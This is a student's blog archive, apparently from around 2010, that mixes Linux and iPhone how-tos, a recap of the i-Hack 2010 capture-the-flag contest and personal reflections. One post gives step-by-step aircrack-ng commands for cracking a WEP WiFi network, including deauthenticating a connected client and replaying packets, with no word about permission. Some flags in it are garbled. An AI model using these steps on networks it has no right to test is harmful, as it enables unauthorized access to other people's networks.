Linux : Celcom Internet Tethering via iPhone

By default, I think only Maxis allow us to do Internet Tethering using iPhone. So, we need to add extra config to enable iPhone using Celcom and do Internet Tethering.

First, you must need my_celcom.mobileconfig . Please open via ur iPhone Safari. Then, you can turn on your Internet Tethering. Setting > General > Network > Internet Tethering > via Bluetooth.

Source : http://forum.lowyat.net/topic/868281/+10

Next, we must configure our Linux bos, in my case, I'm using Fedora to connect to Internet via iPhone connection.

Proceed to Bluetooth Network Manager > Preference > Setup new device.

Linux : Easy way to share files with Dropbox

With Dropbox, you will able to share and automatically sync your file into the Dropbox server. Pretty easy and fast too!

For Linux, go here. https://www.dropbox.com/downloading?os=lnx . In this post, this is how-to for Fedora.

Environment : Behind proxy.

1. Download and install dropbox rpm. (rpm -ivh)
2. From terminal dropbox start -i to start Dropbox daemon. Register with Dropbox if you did not have any Dropbox account.

*After the setup, you will see, Dropbox folder in your /home/. This is where Dropbox will sync the folder with the Dropbox server. Basically, you just upload any files on the Dropbox folder and it will automatically sync to the server.

3.After you place any file on the Dropbox folder, let's say Dropbox/Public, you will see there is an small emblem to your file.

4. After awhile, your file will sync to the server. Head to Dropbox account, you will see the file that you just sync via /home/Dropbox folder. :)

*there is a dropbox icon in you tray.

Below are screenshot for Dropbox.

Dropbox /home folder. There is tick green emblem besides the PICLoop.

Blue Dropbox icon tray. Dropbox is running!

Dropbox account on the server.

Cyder 2, Cydia via USB

Cyder 2 is much better release than Cyder. With a clean interface and proxy settin with the option to push the downloaded app to Cydia AutoInstall folder.

So, you can get it here.

You must have afc2add to prevent any problem.

Picasa 3 on Fedora 13

Oh yeah. After few weeks of using Picasa 3.0, Picasa suddenly crash. Nvm.

Here is the workaround.

Picasa 3.0 for Fedora. Can get it here : http://dl.google.com/linux/rpm/testing/i386/picasa-3.0-current.i386.rpm

Stated there, All downloads are approximately 30 MB: Picasa software (13 MB), Wine (11 MB) and Gecko engine (6 MB).

So, I assume Gecko is the culprit.

Let's setup Gecko first.

Refer here. http://wiki.winehq.org/picasa

You need winetricks. From winetricks, pick Gecko. Then OK.
Make sure you already have cabextract. yum install cabextract.

Then,

If you behind proxy, set your proxy at /etc/wgetrc

Done.

Google goggle coming to iPhone

What so fuss about Google goggle?

Google Goggles lets you search Google using pictures from your camera phones. We take an image as input, and using several image recognition backends (object recognition, place matching, OCR, etc), we return relevant search results

So? Checkout this video.

Every time someone asking me about Android, this is the software I did mention after all the "What is Android?" explanation.

Since I less travelling and maybe someday, for any reason I will travel to anyplace you can name it, this is the first software that will come in my mind.

Snap the picture, and Google goggle will do the job for you by acquiring any related information, so you will not bother to ask people. Independent huh?

As much as Google goggle is made for Android, I'm looking forward for this software coming to iPhone. With the new push for Google app in iPhone, this is the major step for users to maximize the Google app.

And, to have Google Talk standalone app with backgrounding would be awesome! :)

i-Hack 2010

18 out of 27. Fantastic achievement. LOL.

Represent UTP with the name of d0t, here come m0d0 (me), wadefak and zeff. We participated in Hacking & Defence categ. So, from the close source, this hacking & defence is totally different from previous H&D. This time, each team have a server where they need to defend it (prevent from attackers to get the flag) and at the same it, the need to attack other servers (get others flag) in order to get the point.

The whole system was based on topup system. Where to gain something, u need to buy. Initially, we have Y (yen)3000 to start with. 1st thing we bought was user password in our server in order to start daemons.

We have 3 daemons :
backdoor
echo
apache2

All daemons must be running while the scoreboard will check the service. Point will be deduct if the daemon is down. To make it short, in our server, we have jobberbase as a webpage. There is a flaw, which is in the upload section for applying jobs. Race condition.Google "php race condition".

However, we did try something about it but we did not aware of the race condition flaw. As matter of fact, most of the team did not aware of it. Exception to darkc0de,w0nderpets. Maybe?

Stegno was very effing hard. Kot? Hahaha. But, several guys manage find a way to solve it, and maybe miss two or 3 steps. Kudos to them.

Anyway, it was a very good competition. Fair enough to the committee, I guess. Just, we when ask something, they will reply "Jap eh, nak tanye org dulu". Y lar dat thing happen. I will happily to interact with the "org" directly. Just like previous i-Hack where all team were place in one big cold hall, and straight away we can see the sifus (SCAN) yang buat soalan.

As a team members, I will partially take the blame on the fall of the UTP legacy (lol). So, I did realize my mistake where I did not directly engage with the organizer after there were numerous time of our box is down. Kene attack ke? I don't think so.

Ni silap die, bile box tu down, on my behalf, aku x straight away put my hands up high in the air and asking them about the box (reboot ke..) . Yet, for the last 3 hours, I remain calm as buaya in the sungai waiting for food because lapar kaw2.

------------------------------------------------------------------------------------------------
As for the committee, I believe, there are significant things that you can learn from it. Aku rase, kalau taruk sume team dalam hall lagi better kot. Comfortable. Anyway, hacking and defense. LOL.

2nd, i believe, previous ihack ade buat name tag dekat participant punye card. apsal xtaruk dah? isk. kang sonot ade name situ. xde la tulis participant je. tulis la n00bies ke ape ke.

3rd, my teammate, teng aka wadefak, have serious problem with his connection. Switch problem ke, cable problem ke. This things happen byk kali throughout the fasting 12 hours. Kerepek sedap.xpe dimaafkan.

4th, 12 hours is too long la bang. sakit kepale den don tenung lappy tu. previous buat 2 days, sronok kot. maybe defcon macam tu. xtau la. tapi, if 2 days best sikit kot?
-------------------------------------------------------------------------------------------------
Conclusion, good event. Matlamat korang utk event maybe tercapai, maybe x, who cares. We as the participants, enjoy it. Good job.

For UTP team, GG :P

*stegno susah wei. (sebab n00b)
**mase mule2 ade network, sume pasang backtrack. haha. pakai ke backtrack tu for the H&D? tapi sounds bt cool lah. sebab ramai2 boot :P

Adios

yum update | bypass download limit

It is not a trick or hack anyway, it just another method of how to install or yum update several packages which is more than downloadable size due to proxy or anything.

So, in my case, I believe my download limit is 47Mb in UTP. So, the package of the openoffice.org-core is 87Mb. So, there is now way to update the package via yum update.

I can't update openoffice.org because the -core package must be download first.

What I do is, I download openoffice.org-core ONLY via download manager. Then, we will instruct yum to use openoffice.org-core which we download then update anything else via the command.

yum localinstall openoffice.org-core-3.2.0-12.25.fc13.i686.rpm

Done.

Fedora 13 | Change cursor

Just update to Fedora 13, Goddard.

Although I manage to install cursor, it seems gnome did not update the default cursor. Therefore, we need to change the config.

cd /usr/share/icons

You can see several icon there. A new cursor folder should be there. If none, do copy the cursor folder to /usr/share/icons

cd default

in this directory, you will see index.theme. Default is dmz-aa. Change to cursor folder name you want to. In my case, Comix.

[Icon Theme]
Inherits=ComixCursors-Black-Regular

Restart X. (logout and login)

Done.

iPhone OS 4.0 Features

“So that is iAd, and that’s our seventh tent-pole.” Applause. “Let’s review: multitasking, folders, iBooks, GameKit, iAd… these are just some of the over 100 user features, and over 1500 new developer APIs in iPhone 4.” - from live.gdgt.com

iPad and iPhone 3GS would do almost everything.

Now, we’re releasing a developer preview today. You can get it today at developer.apple.com. We are releasing it to end users this summer, and that’s for the iPhone 3GS and iPod touch 3rd gen (last fall’s). They will run pretty much everything.”

Meanwhile, for iPhone 3G and iPod Touch 2nd generation :

“For iPhone 3G and iPod touch 2nd gen, they will run many things, but not everything — they will not support multitasking, the hardware just can’t do it.”

Shit. *face palm*

For the game social networking features, it pretty much interesting. And maybe, knock out Xbox Live. LOL. Now, we can challenge player over the net. Nice!

As in folders, for jailbreakers, we already used to it by Categories application. However, since the Folders features update in iPhone OS 4.0, it pretty much preferable.

I do not bother much about iAd since it focus on the developers. I think, the iAd features will change the whole level of advertisement on mobile platform. User can interact with the advertisement without leaving their app.

Apple will host and serve the advertisement, and 60% of the profit goes to developers.

But, still NO FLASH. One of the ad use HTML5. LOL. Ouch, Adobe.

Oh ya, pretty much improve on Pandora and Skype too. Can't comment much since i miss the live event of it.

I wonder about my wifi issue will solve. Ouh, please.

iPhone OS 4.0 dev available to developers starting tomorrow. Meanwhile, for end users, at the end of this summer.

Bootable USB with UNetbootin + Gparted

Indeed, I want to resize my Fedora 12 partition. Google up, the best solution was to use gparted.

Gparted : The GParted application is the GNOME partition editor for creating, reorganizing, and deleting disk partitions.

However, we need to make our USB bootable. Use UNetbootin.

UNetbootin : UNetbootin allows you to create bootable Live USB drives for a variety of Linux distributions from Windows or Linux, without requiring you to burn a CD

The easiest combination is to use gparted livecd + unetbootin + usb.

Goodluck! :)

Update :

Please do chckdsk if you boot your windows. I afraid, windows will assume your resize partition is still unformat.

The Last Lecture

ATM, I finished reading The Last Lecture by Randy Pausch. Thanks to a friend who lend me her book to me. Randy Pausch is a professor in computer field who diagnosed with tumor and only have three to six months to live. He was invited to give a "Last lecture" to the audience.

What was in his mind after he knows he only gonna live within the time frame? That's the thought that keep me through this book. Either, he gonna sadden over the news or enjoy the rest of his life? I got completely wrong. What he was trying to do is, to leave a very fond memories to his beloved Jai (wife), kids (Chloe,Logan, and Dylan) and people who involve with him. He knows Jai will take over the father's job once he leave them. I believe, by the time that this book was wrote, his kid is still young. He want to leave a memory for them because, the last lecture, books will remind them of their fathers whom to me, was a very diligent, smart and wisdom guy.

You should read this book. Seriously.

Talking about the memories. I don't think my late father did what he supposed to. I don't blame him. Might be, he just don't have the time for me. Well, I receive it with open heart. I got my mom all the way with me. I got several pictures with him. I think, 2 or 3 years old with him and I hold my cat. My only toys at that time was a cat. But, I does not mean I twist and kick the cat. And, the last memory I had was in my standard 3. It was my birthday. My mom do ask him a favor to spend time with me. So, we (my dad,mom n I) went to the Pantai Timur at KB. Then, he bought me a watch. A gray watch which I kept until my lil bro throw/ miss placed it.

On the day when he passed away, 30 minutes before he passed away, I cried. My mom decide to go back at home because another members of family had called her. So, she leave me at the house (grandma's house). I did not like the idea she leave me alone with the rest of the family members in a sad environment at that time. So, I went out, sat at the staircase and cried. Later on, my step mother come to get me. She tried to calm down with the assumption I cried because of my father. Am I? I'm not so sure. What I'm aware of, my mother leave me with the rest of the family members. Which, I do not close to. What a 10 years kid can think of?

Am I sad? Might be but not really. Because, I can't remember any single thing what he did except the gray watch. I did not miss the moment because I don't have any moment.

As Randy trying to give the memories to his kids, that reminds me of my past story. His kids are lucky because he try to spend the time with them. Try to forge a memory in their brain so one day, they can remember what their father are made of.

So, yeah.. these good old days. Heh.

:)

Papers to be review!

ATM, I got 6 papers to be revise until this Friday. It's for my CVIP class. Where, each of the student must review all references and give a presentation for 20 minutes. Our lecturer, Dr A, state that, at least, there is must be 15 references for the presentation.

Well, there are a lot of references to be revise, but I will stick with my way. I will present all papers and provided the external link if something across the paper worth the revision. The target is, to present the best was as I understand about the papers and nail it. This whole projects consists of 30% of my coursework. Chaiyok2~!

Oh, BTW, my project is Image Fusion. Basically, it combines the low resolution image and high resolution image to produces the best desired image at the end. Widely used in satellite application.

Eh, Arsenal won 5-0 and hatrick by Bendtner seal Arsenal through quarter final. Yeay. Happy. But, I missed the game because I want to rest and wake up in the morning review the paper. Heh. NVM. What matters to me is, Arsenal proceed to latter stage. :P

Exhausted weeks

For the previous 2 weeks, I think I overload my body with sports activity. ISC,Sport Carnival, jogging, gym etc. Plus with the extreme hot weather (extreme ke? extreme kot), make it worst. I can't last for 2 hours in class without drinking. Although exhausted, the previous weeks was such an interesting weeks for me. Thanks to those friends, I did enjoy my weekends or even weekdays :P

For ISC, I entered table tennis and futsal. For table tennis, I only managed to win 3rd place after beaten by Vietnamese (semi) who take advantages of my mistake. Haha. Damn it. Ampunkan saye for not to perform up to my standard. Shit! Oh ya, suddenly, he become my new friend. Yeay~ I thought, that guy was a junior. Certainly not. I watched his game before and the only mistake he mad was, his reluctance to attack the ball. Well, it just my opinion for him to improve his game. He won the tournament. Congratz Hoan!

Move on to futsal, this tournament last for 2 days where the 1st day, I in the team and the next day, I'm off to table tennis. Sorry guys! -_-"

Guess what, our team name is De' Rumah Sukan. Funny? Yes. Haha. First day was such an enjoyable match. We won 2 out of 3. The next day, if I can remember correctly, we proceed to quarter final by won the match by penalty and lost out the next game to an Egypt team. I can't blame them. They were good guys with good spirits. Especially alip who become the manager of the team. U rock! haha

I hope I can rest well for this week. Recover my energy! Heh. Hopefully la kan.

Team mates with manager,Alip (black t-shirt guy). I'm not in the picture. LOL. Table tennis mehh

1st day of the futsal match. Everybody looks tired.

We won 3-0

Panas kaw2 main futsal. Lebam kaki gua

WiFi WEP Cracking

Since this blog turn into my own personal note, therefore, this WiFi cracking will become my future reference. With this method, I usually achieve my target, cracking WiFi with WEP encryption.

There are several type of WiFi encryption. They are :

  • WEP

  • WPA

  • WPA2

Why we can crack WEP easily? Here.

We also can crack WPA, but its gonna take hell lots of time and we need dictionary too. Here.

Since we live in modern world, I believe, there is significant upgrade on the hardware part which make things easier for us. Such as CUDA. I had explained before here.

I don't have any screenshot with me now. So, I will just dump what inside my head.

1.airmon-ng start wlan0
Put your wifi card on monitor mode. Result, you can see mon0 at the output.

2.airodump mon0
Look at the output. Set your WEP target. Let's say 11:22:33:44. With ESSID "test" on channel 11

3.airodump --bssid 11:22:33:44 --channel 6 -w test mon0
We will capture specific packet from bssid 11:22:33:44 on channel 6 and write (-w) the packet into file name called "test"

Leave it for a while until you found the associated client with the router. Lets say aa:bb:cc:dd. Open new terminal

4.aireplay-ng -0 1 -a 11:22:33:44 -c aa:bb:cc:dd mon0
-0 stands for deauthenticate. U will deauthenticate the client to intercept their IV for cracking.

-a : bssid

-c : client associated to the bssid

Look at the output, you will see some XXX[12|120] <- this number is just an example.

5.aireplay-ng -3 -b 11:22:33:444 -b aa:bb:cc:dd mon0
We need to generate more packet to speed up our process. Leave it for awhile.

Check what is "-3"

New terminal

6.aircrack -n 128 --bssid 11:22:33:44 test*.cap
Depends on ur luck. But, as far as my experience, I need about 20k IVs to crack the password.

Just leave it, really.

Good luck.

5 years at a glance

Okay. Wake up people. It's 2010. I will short-sighted for a while n look back my 5 years backs. Lets see..

2004

Eh. Form 4. Hurm. Jeli is my new home town since I stay there quite long. 4 years up to date since 2001. My secondary school, MRSM Jeli. Lol. I'm quite active with sports. Table tennis, basketball, soccer and others. Sapu bersih all sports that I can participate.

However, my fav goes to table tennis. I usually practice with my teacher, Cg Maswan. Ah. Now for the funny part. All students need to go back to their room before 630pm everyday. Since I practice with my teacher, I always return kinda late to my room. Sometime, around 715 or 730pm.

Cg Maswan. He's the one who teach me and speed up my skills in table tennis. I remember, the 1st day he ask me to play with him, I was like newbie. Always running here n there since maybe, he want to teach me a lesson. Well, my 1st table tennis bat cost me RM100. I gave him RM100, and he willingly to help me buy the bat. Thanks for that.

Things to ponder :

  • From I-dun-care-what-you-doing person, I changed to I-care.

  • Ping Pong a.k.a table tennis?

  • I start noticing several girls out there. Don't laugh.. OK. You may.

2005

My SPM year. SPM 2005. Not a great year for me though. With all the BWP things goings on, sports etc. I set my target for the spm, overseas and UTP. From there, I work a lil bit hard to achieve my target.

Alhamdulillah, my SPM trial result kinda OK. But I'm not totally happy with it. I need to improve. So, cut cut cut cut. SPM trial lead me to UTP's interview under MARA loan.

SPM. Summary, I got B's in Chemistry. Sigh. Y? Nvm. Xde rezki :(

UTP's interview is the 1st formal interview for me.

Things to ponder :

  • BWP is not a great achievement, but, it quite give me invaluable experience to me la kot

  • Tunas Saintis at Pontian, Johor. Top 10 je. I develop database system for MRSM focus on their student n teachers. Using VB.

  • Lots of friends. Achievement la jgk since at 1st, I'm a quite person. Believe it la.

2006

Eh. I da masok UTP. SPM results, sucks. Xde harapan for overseas. Nvm. Xde rezki lagi? Ish. So, I was in Electrical and Electronic Engineering. I got my 1st lappy. Acer Aspire xxx. I don't remember the series.

So, 1st sem in UTP kinda enjoyable to me. I hate late evening class. Sigh. Selalu skip. haha.

Morning, as usual. Go to classes. Balik class, "sepam". Sepam actually means "sekali lagi". It apply when I play multiplayer FIFA 2006 on LAN. Although it means sekali lagi, sepam can lead to berkali2 sepam. Darn. Everyday, I think, I spend 3 4 hours on FIFA. Sepam punye pasal.

Nothing much this year. Although, many of my friends doing great in their 1st sem exam, I'm not. So, no heart taken :P

Things to ponder :

  • Looking forward to university life? Inspired summore :)

  • Every of freaking free hours at UTP, I spend on my computer

2007

2nd year in UTP. Wth I'm doing? Still spends every hour of my leisure time on laptop. Btw, I sold it to unknown buyer then grab desktop computer. Oh, from FIFA, move to PES. Lol.

Talking about linux, my 1st exposure to Linux is due to UTPChat. We have #linux where I mostly ask stupid question there. haha. My force my self to remove Windows from my computer, then decide to survive for linux for the whole sem. Do I succeed? Hell no. I still need my Windows to play games. Linux does not have a problem to play games, just wine it, except, I just wanna play games. Click and run. No need to config for the sake of stupid games.

From #linux, I know several dudess which share the same passion with me, Kage,Yondie, yoda This 3 guys are obvious person in #linux since they answered most of my question :P

Things to ponder :

  • I involve in FOSS. At least in UTP. Happy with it.

  • Start to acknowledge some of my geek friends?

2008

Oh. Now I wonder? What was being me. Relationship is totally sucks. So, out of question. 3rd year in UTP. Hurm. Still, lots of time involve with computer and especially linux. Nothing much happen at least what I can remember of la.

Thins to ponder :

  • Y it happen? Y can be anything

  • You sucks

2009

Cut cut cut. Here I am. Doing my internship at Freescale. Gonna completed it tomorrow after 8 months here.

Oh, btw, 8 months really teach me on how to communicate. Example email. When I look up back my email writing. Somehow, I find it funny or totally. With the language, style, words. It's totally crap. N now, I think, I can write proper email. At least, I google on how to write proper email?

My curiosity level in crease in term of how it works, why it happens that lead me to stick up with google all the way. Maybe, sebab Freescale punye internet sgt laju compare to UTP. :D

Things to ponder :

  • Working experience is cool

  • Every morning bangun pagi sebab takut lewat pergi kerja. Xkire tido pukul brape, mesti bgn pg jgk. LOL

Panjang la plak this post. Patot la rase bosan taip. Panjang sgt. Aih~

Looking up for 2010~ Final year in UTP and gonna spend my time on FYP.

05 January 2010
